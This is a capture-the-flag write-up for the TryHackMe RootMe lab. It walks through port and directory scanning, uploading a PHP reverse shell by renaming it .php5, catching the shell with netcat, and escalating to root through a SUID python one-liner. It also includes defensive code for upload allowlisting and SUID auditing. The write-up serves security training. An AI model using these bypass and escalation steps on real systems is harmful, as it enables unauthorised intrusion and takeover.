RootMe
This is a CTF challenge from TryHackMe; I'm going to explain it here step by step.
Introduction
Task 2 Reconnaissance
Let's scan the ports with nmap. We found 2 open ports with 2 services running: SSH and HTTP.

nmap -sCV 10.10.92.239

-sCV:
- scans for open ports
- identifies the services and versions running on those ports (-sV)
- executes the default NSE scripts (-sC)
- retrieves banners and configuration details
Let's enumerate the server with gobuster:

gobuster dir -u "http://10.10.1.104/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

- gobuster: calls gobuster
- dir -u url: directory scanning mode, with the target URL
- -w: path to the wordlist
- /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt: the wordlist I chose
Reconnaissance answer
Task 3 Getting a shell
Find a form to upload a file, get a reverse shell, and find the flag. Let's go to the target machine, 10.10.1.104 (mine is this one); the browser displays this
Tryhackme says this
Search for "file upload bypass" and "PHP reverse shell".
Then go to https://pentestmonkey.net/tools/web-shells/php-reverse-shell and download the file, or copy it. Now let's edit reverse-shell.php:
- $ip = '127.0.0.1'; // CHANGE THIS to the IP of the AttackBox or of your OpenVPN connection
- $port = 1234; // CHANGE THIS to whatever port you want
After that, try to upload the file, for example shell.php, and the site returns this error
It's because PHP is not permitted (1). So let's rename the file from shell.php to shell.php5. There are two ways to change the file name. One is from the terminal, typing this:

mv shell.php shell.php5
With that it now works. But I like to use Burp Suite. With Burp Suite we catch the request and edit it. Note: you need basic knowledge of Burp Suite to do this. Let's catch the request
After that we add a 5 at the end: shell.php5. It has to look like this
Then click Forward about 3 times and the file will be uploaded. The browser shows this when the file was uploaded successfully
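The reason the rename works is that the form uses a denylist (refuse ".php") instead of an allowlist. The following is an added example, not code from the TryHackMe room or from this writeup: a check that behaves like the challenge's form, next to a hardened allowlist check and a safe storage name. The function names and the two extension sets are my own assumptions for the demonstration.

```python
# Added example, not code from the TryHackMe room or this writeup: a weak
# extension check of the kind the challenge's upload form seems to use, next
# to a hardened allowlist check. Function names and the extension sets are
# assumptions made for the demonstration.
import secrets
from pathlib import PurePosixPath
from typing import Optional

# Extensions that common Apache/PHP configurations may hand to the PHP
# interpreter (constructed reference list for this demo).
PHP_LIKE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Extensions the form is supposed to accept (constructed for this demo).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def weak_is_allowed(filename: str) -> bool:
    """Denylist check: refuses only a '.php' ending, so 'shell.php5' passes."""
    return not filename.lower().endswith(".php")


def strict_is_allowed(filename: str) -> bool:
    """Allowlist check: every suffix in the name is inspected, case-insensitively.

    Rejects 'shell.php5', 'shell.PHP', 'shell.php.jpg', '.htaccess' and names
    carrying a directory part or a NUL byte; accepts only a single image
    extension as the final suffix.
    """
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return False                          # bare file names only
    suffixes = [s[1:].lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:                          # 'photo' or '.htaccess'
        return False
    if any(s in PHP_LIKE_EXTENSIONS for s in suffixes):
        return False                          # also catches shell.php.jpg
    return suffixes[-1] in ALLOWED_EXTENSIONS


def safe_storage_name(filename: str) -> Optional[str]:
    """Name to store an accepted upload under: random, never the client's own name."""
    if not strict_is_allowed(filename):
        return None
    ext = PurePosixPath(filename).suffix[1:].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for candidate in ("photo.png", "shell.php", "shell.php5", "shell.php.jpg"):
        print(f"{candidate:14} weak={weak_is_allowed(candidate)!s:5} "
              f"strict={strict_is_allowed(candidate)}")
```

Even with the allowlist, the upload directory should be served with script execution disabled (for Apache/PHP, for example `php_admin_flag engine off` for that directory), so that a file that slips through is still returned as static content rather than run.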
Now let's configure a listener to get the reverse shell:

nc -nlvp 4444

- nc: calls netcat
- -n: avoids netcat's DNS resolution
- -l: puts netcat in listening mode, waiting for incoming connections
- -v: enables verbose mode (more details)
- -p: specifies the port to listen on
- 4444: the chosen port number
Now that we have a port listening and the file on the website, go to /uploads and click on shell.php5.
We got a reverse shell.
Type this command: `find / -name "user.txt" 2>/dev/null`
It will return
path/to/user.txt

- find: command to search for files and directories in the filesystem.
- /: specifies that the search starts from the root directory (/) and includes all subdirectories.
- -name "user.txt": searches for a file or directory named user.txt.
- 2>/dev/null: redirects error messages to /dev/null, ignoring them (e.g., "Permission denied").

After you find the file user.txt, type `cat path/to/user.txt` and you will get the flag.
Task 4 Privilege Escalation
Now that we have a shell, let's escalate our privileges to root.
TryHackMe says this: "Search for files with SUID permission, which file is weird?" Then type this:

find / -user root -perm /4000

- find: searches for files and directories.
- /: starts the search from the root directory (/) and its subdirectories.
- -user root: filters for files owned by the root user.
- -perm /4000: matches files with the SUID permission bit (4000) set.
There are a lot of SUID files, but we found an important one:

/usr/bin/python
After finding the SUID binary, go to https://gtfobins.github.io/ and search for python. There are several options, but take this one:

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Now go to the terminal and use the command to escalate privileges:

/usr/bin/./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
As you can see, I ran a command:

whoami

This identifies who you are in the terminal: normal user or root.
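From the defender's side, the question "which SUID file is weird?" is a baseline comparison: root-owned SUID binaries that a stock install does not ship, and interpreters in particular, are the ones to look at. The following is an added example, not part of the TryHackMe room or of this writeup, that does exactly that comparison. The baseline, the interpreter list and the SAMPLE_FILES entries are constructed for the demonstration; collect_suid() gathers real entries on a Linux host and the function names are my own.

```python
# Added example, not part of the TryHackMe room or this writeup: a defender's
# version of "which SUID file is weird?". It compares root-owned SUID binaries
# against a baseline of expected ones and flags interpreters regardless of the
# baseline. BASELINE_SUID, INTERPRETER_NAMES and SAMPLE_FILES are constructed
# for the demonstration; collect_suid() gathers real entries on a Linux host.
import os
import pwd
import stat
from typing import Dict, Iterable, List, Tuple

# SUID-root binaries a stock Linux install is expected to have (constructed list).
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/bin/mount", "/bin/umount", "/bin/ping",
}

# Programs that should never carry SUID root, whatever the baseline says.
INTERPRETER_NAMES = {"python", "python2", "python3", "perl", "ruby",
                     "bash", "sh", "vim", "find"}

# Constructed sample of (path, st_mode, owner) tuples, as collect_suid() would return.
SAMPLE_FILES: List[Tuple[str, int, str]] = [
    ("/usr/bin/passwd", 0o104755, "root"),
    ("/usr/bin/sudo", 0o104755, "root"),
    ("/bin/ls", 0o100755, "root"),           # no SUID bit at all
    ("/usr/bin/python", 0o104755, "root"),   # the odd one out on this box
    ("/home/user/tool", 0o104755, "user"),   # SUID, but not root-owned
    ("/usr/bin/wall", 0o102755, "root"),     # SGID only
]


def is_suid_root(mode: int, owner: str) -> bool:
    """Same selection as `find / -user root -perm /4000` on regular files."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and owner == "root"


def audit_suid(entries: Iterable[Tuple[str, int, str]],
               baseline: Iterable[str] = BASELINE_SUID) -> Dict[str, List[str]]:
    """Split SUID-root files into baseline matches and ones that need a look."""
    baseline = set(baseline)
    report: Dict[str, List[str]] = {"expected": [], "unexpected": []}
    for path, mode, owner in entries:
        if not is_suid_root(mode, owner):
            continue
        if path in baseline and os.path.basename(path) not in INTERPRETER_NAMES:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def collect_suid(root: str = "/") -> List[Tuple[str, int, str]]:
    """Walk the filesystem and return (path, mode, owner) for every SUID regular file."""
    found: List[Tuple[str, int, str]] = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:                  # permission denied, vanished, etc.
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                try:
                    owner = pwd.getpwuid(st.st_uid).pw_name
                except KeyError:
                    owner = str(st.st_uid)
                found.append((path, st.st_mode, owner))
    return found


if __name__ == "__main__":
    report = audit_suid(SAMPLE_FILES)        # swap in collect_suid() for a live host
    print("expected  :", report["expected"])
    print("unexpected:", report["unexpected"])   # ['/usr/bin/python']
```

On the challenge box the finding maps straight to the fix: an interpreter does not need the SUID bit, so `chmod u-s /usr/bin/python` removes the escalation path, and a baseline like the one above, taken from a clean image, lets the audit be re-run after every change.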
#!/bin/bash
echo "If there are any grammatical errors, sorry, I'm learning English :)"